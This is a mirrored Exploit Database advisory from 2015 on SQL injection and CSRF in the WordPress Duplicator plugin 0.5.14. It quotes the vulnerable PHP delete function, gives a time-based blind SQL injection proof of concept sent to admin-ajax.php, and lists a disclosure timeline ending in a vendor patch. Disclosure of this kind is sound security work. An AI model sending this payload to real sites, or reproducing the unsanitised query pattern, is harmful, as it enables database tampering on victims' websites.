WordPress Plugin Duplicator 0.5.14 – SQL Injection / Cross-Site Request Forgery

• Exploit Database
• 14 阅读

• 作者： Claudio Viviani
  日期： 2015-04-13
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/36735/

• ######################
  
  # Exploit Title : WordPress Duplicator <= 0.5.14 - SQL Injection & CSRF
  
  # Exploit Author : Claudio Viviani
  
  # Vendor Homepage : http://lifeinthegrid.com/labs/duplicator/
  
  # Software Link : https://downloads.wordpress.org/plugin/duplicator.0.5.14.zip
  
  # Date : 2015-04-08
  
  # Tested on : Linux / Mozilla Firefox 
  
  ######################
  
  # Description
  
   WordPress Duplicator 0.5.14 suffers from remote SQL Injection Vulnerability
   
   
   Location file: /view/actions.php
   
   This is the bugged ajax functions wp_ajax_duplicator_package_delete:
  
   function duplicator_package_delete() {
  
  DUP_Util::CheckPermissions('export');
  
  try {
  	global $wpdb;
  	$json		= array();
  	$post		= stripslashes_deep($_POST);
  	$tblName	= $wpdb->prefix . 'duplicator_packages';
  	$postIDs	= isset($post['duplicator_delid']) ? $post['duplicator_delid'] : null;
  	$list		= explode(",", $postIDs);
  	$delCount	= 0;
  
  if ($postIDs != null) {
  
  foreach ($list as $id) {
  			$getResult = $wpdb->get_results("SELECT name, hash FROM `{$tblName}` WHERE id = {$id}", ARRAY_A);
  			if ($getResult) {
  				$row		=$getResult[0];
  				$nameHash	= "{$row['name']}_{$row['hash']}";
  				$delResult	= $wpdb->query("DELETE FROM `{$tblName}` WHERE id = {$id}");
  				if ($delResult != 0) {
  
  
   $post['duplicator_delid'] variable is not sanitized
  
   A authorized user with "export" permission or a remote unauthenticated attacker could
   use this vulnerability to execute arbitrary SQL queries on the victim
   WordPress web site by enticing an authenticated admin (CSRF)
  
  
  ######################
  
  # PoC
  
   http://target/wp-admin/admin-ajax.php?action=duplicator_package_delete
   
   POST: duplicator_delid=1 and (select * from (select(sleep(20)))a)
  
  
  ######################
  
  # Vulnerability Disclosure Timeline:
  
  2015-04-08:Discovered vulnerability
  2015-04-08:Vendor Notification
  2015-04-09:Vendor Response/Feedback 
  2015-04-10:Vendor Send Fix/Patch
  2015-04-10:Public Disclosure 
  
  #######################
  
  Discovered By : Claudio Viviani
  http://www.homelab.it
  				http://ffhd.homelab.it (Free Fuzzy Hashes Database)
  				
  info@homelab.it
  homelabit@protonmail.ch
  
  https://www.facebook.com/homelabit
  https://twitter.com/homelabit
  https://plus.google.com/+HomelabIt1/
  https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
  
  #####################